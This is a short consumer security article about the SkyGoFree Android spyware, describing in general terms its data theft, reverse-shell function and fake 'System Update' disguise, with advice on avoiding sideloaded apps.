SkyGoFree spies on your Android phone and your messages
This spyware is Android threat-of-the-year so far in 2018 that spies on your Android phone and your messages. The decompiled Java code of the malware reveals the range of data it knows how to steal. A code in the decompiled is known as “RUBICA”.Rubica is an Italian word for Address Book. Most part of the code was written by an Italian programmer/person.
There’s loads more treacherous functionality in the malware, including a function called StartReverse() that connects your phone up to a server run by the crooks to given them what’s called a reverse shell.
Normally, to logon into a command prompt (known in Unix and Linux as a shell) you need to initiate a connection to a device, which means getting through any firewalls and network address translation that’s in the way.
The sample that was examined pretends to be a “System Update”, using a green Android icon:
If you launch the app, it starts running in the background but almost immediately removes its own icon to give you the impression that the “update” has finished.
Fortunately, the app still shows up on the System/Apps page, where you can stop it and uninstall it:
Just note that this application was never in Google Play Store, so you’d have to go to the Settings/Security page and turn on the non-default option to “Allow installation of apps from unknown sources” to get infected:
Google Play is not the virus-free walled garden that you might have been led to believe, but it is still far safer than accepting apps from unknown sources such as alternative markets, unregulated Android forums or links sent to you by colleagues, friends or family.
What to look for
- Stick to Google Play
- Use an Android anti-virus
- Don’t trust system updates offered by third parties